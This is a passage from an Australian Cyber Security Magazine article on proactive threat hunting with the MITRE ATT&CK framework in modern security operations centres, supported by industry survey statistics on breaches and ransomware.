ACSM
Cyber Threat Hunting leveraging MITRE ATT&CK Framework – Must for Modern SOC By Neha Dhyani
T
hreat hunting is a proactive cyber defense activity, which is focused on the pursuit of attacks and the evidence that attackers leave behind when they’re conducting reconnaissance, attacking with advance malware, or exfiltrating critical data. Rather than just relying on reactive information or hoping that SOC (Security Operation Center) tool flags and alerts to the suspicious activity, threat hunter will apply human analytical capacity and understanding about environment context to more quickly determine when unauthorized incident happens. Threat Hunting allows attacks to be discovered during early phase with the goal of stopping them before adversaries can carry out their attack objectives. While skill & experience definitely helps, the ever-changing landscape of threat actors, and their sophistication, requires the threat hunter to take a well-organized approach and follow an open framework that structures a methodical hunt based on updated TTPs (tactics, techniques, and procedures) of top global threat actors.
Simplifying SOC Complexity with evolving threat landscape As per Gartner Board of Directors Survey 2022, 88% of respondents viewed cybersecurity-related risk as a business risk, not just a technology risk & 51% of respondents had experienced a cyber-security risk incident in the past two
24 | Australian Cyber Security Magazine
years. By getting ready for the inevitable breach, rather than expecting that it will always be prevented, organizations having Modern SOC with threat hunting capabilities can deliver a better security posture and set the foundation for their team to proactively hunt for advance threats. As per VMware Global Incident Response Threat Report (2021), respondents indicated that targeted victims now experience integrity and destructive attacks more than 50 % of the time. As per report, more than 60 % of respondents reported ransomware attacks during the past 12 months, and these attacks are becoming increasingly malicious. This escalation stems from adversaries implementing multistage campaigns involving penetration, persistence, data theft, and extortion. These stats prove that attacks are becoming more stealthy, destructive, and targeted leveraging advanced techniques. As per IBM’s cost of data breach report 2021, it took an average of 287 days to identify and contain a data breach On average, it takes organizations more than 7 months to detect a malicious attack and another 81 days to contain it. And the average cost of a breach lasting more than 200 days is $4.87 million, which means that every second counts. Attacks that caused the most damage and are toughest to detect and prevent include Advanced Persistent Threats (APTs) that are carried out during prolonged dwell times. Cyber Threat hunting is particularly needed in battling APTs
